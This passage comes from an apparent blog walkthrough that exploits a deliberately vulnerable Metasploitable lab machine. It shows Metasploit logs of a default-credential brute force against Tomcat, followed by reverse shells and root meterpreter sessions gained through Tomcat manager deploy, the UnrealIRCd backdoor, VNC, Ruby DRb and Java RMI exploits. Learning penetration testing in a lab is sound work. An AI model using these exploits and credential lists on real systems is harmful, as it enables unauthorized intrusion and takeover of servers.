[-] 172.16.243.143:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 172.16.243.143:8180 - Login Successful: tomcat:tomcat
[-] 172.16.243.143:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Bingo! It turns out that one pair of default credentials, tomcat / tomcat, were being using by the management interface for the Tomcat application. This further enabled the use of the exploit/multi/http/tomcat_mgr_deploy exploit to gain a shell on the target server:

msf auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(multi/http/tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(multi/http/tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(multi/http/tomcat_mgr_deploy) > set rport 8180
rport => 8180
msf exploit(multi/http/tomcat_mgr_deploy) > run

[*] Started reverse TCP handler on 172.16.243.144:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6279 bytes as CmEAflXTKfIlg9DUi4VaKueJd7.war ...
[*] Executing /CmEAflXTKfIlg9DUi4VaKueJd7/aB8I27TFaCcggxL7zt1BqigP.jsp...
[*] Undeploying CmEAflXTKfIlg9DUi4VaKueJd7 ...
[*] Sending stage (53837 bytes) to 172.16.243.143
[*] Meterpreter session 6 opened (172.16.243.144:4444 -> 172.16.243.143:51511) at 2018-03-25 19:31:02 -0400

meterpreter > getuid
Server username: tomcat55
meterpreter > getwd
/

UnrealIRCd

Another service running on the target system was the UnrealIRCd daemon. A search in Metasploit turned up an exploit that leveraged a backdoor for remote command execution. Running this exploit against the target system returned a fresh shell, in this case another root process.

msf > search unrealircd

Matching Modules
================

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution


msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 172.16.243.144:4444
[*] 172.16.243.143:6667 - Connected to 172.16.243.143:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 172.16.243.143:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo TGzZR4D3jPBPYfwb;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "TGzZR4D3jPBPYfwb\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 7 opened (172.16.243.144:4444 -> 172.16.243.143:60426) at 2018-03-25 20:04:59 -0400

id
uid=0(root) gid=0(root)
hostname
metasploitable

VNC

Running the default configuration of the auxiliary/scanner/vnc/vnc_login Metasploit module led to a successful login credential, using the basic password: password

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > run

[*] 172.16.243.143:5900   - 172.16.243.143:5900 - Starting VNC login sweep
[!] 172.16.243.143:5900   - No active DB -- Credential data will not be saved!
[+] 172.16.243.143:5900   - 172.16.243.143:5900 - Login Successful: :password
[*] 172.16.243.143:5900   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

From my attacker machine, I could then leverage this credential to access the system directly:

root@kali:~# vncviewer target
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password:
Authentication successful
...

Ruby DRb RMI

Looking at some of the remaining ports, port 8787’s Ruby DRb RMI seemed particularly interesting.

8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)

Therefore, I decided to do a search in Metasploit for the drb service, and found a Linux exploit that seemed promising (exploit/linux/misc/drb_remote_codeexec). Running that against the target system led immediately to another fresh shell, with root privileges.

msf > search drb
Matching Modules
================

   Name                                                   Disclosure Date  Rank       Description
   ----                                                   ---------------  ----       -----------
   exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  Distributed Ruby Remote Code Execution
   exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)


msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(linux/misc/drb_remote_codeexec) > run

[*] Started reverse TCP double handler on 172.16.243.144:4444
[*] Trying to exploit instance_eval method
[!] Target is not vulnerable to instance_eval method
[*] Trying to exploit syscall method
[!] Target is not vulnerable to syscall method
[*] Trying to exploit trap method
[*] Accepted the first client connection...
[!] Target is not vulnerable to trap method
[*] Accepted the second client connection...
[*] Command: echo xRb0HkSAZmhcjkV2;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xRb0HkSAZmhcjkV2\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 8 opened (172.16.243.144:4444 -> 172.16.243.143:57407) at 2018-03-25 21:17:00 -0400

id
uid=0(root) gid=0(root)
hostname
metasploitable

Java RMI

Another service that was running, available for exploitation was the Java RMI Registry on port 1099:

1099/tcp  open  java-rmi    Java RMI Registry

Doing a quick search in Metasploit, I was able to find an exploit that looked promising.

msf > search java rmi
...
exploit/multi/misc/java_rmi_server                              2011-10-15       excellent  Java RMI Server Insecure Default Configuration Java Code Execution
...

Loading this up, and configuring the payload to return to my attacker machine, I was able to exploit the vulnerability and get back a meterpreter session with root privileges.

msf > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST      172.16.243.143   yes       The target address
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(multi/misc/java_rmi_server) > set lhost 172.16.243.144
lhost => 172.16.243.144
msf exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 172.16.243.144:4444
[*] 172.16.243.143:1099 - Using URL: http://0.0.0.0:8080/t3sFon2Uy6K
[*] 172.16.243.143:1099 - Local IP: http://172.16.243.144:8080/t3sFon2Uy6K
[*] 172.16.243.143:1099 - Server started.
[*] 172.16.243.143:1099 - Sending RMI Header...
[*] 172.16.243.143:1099 - Sending RMI Call...
[*] 172.16.243.143:1099 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 172.16.243.143
[*] Meterpreter session 9 opened (172.16.243.144:4444 -> 172.16.243.143:48518) at 2018-03-25 21:30:34 -0400
[-] 172.16.243.143:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 172.16.243.143:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/java_rmi_server) > sessions -i 9
[*] Starting interaction with 9...

meterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > shell
Process 1 created.

Wrapping Up

At this point, I wrapped up for my afternoon of exploitation. I had made by way through most of the service exploitations, though I really hadn’t tackled the web server exploitation. Perhaps I attack that in a future article.

Updated:

Comments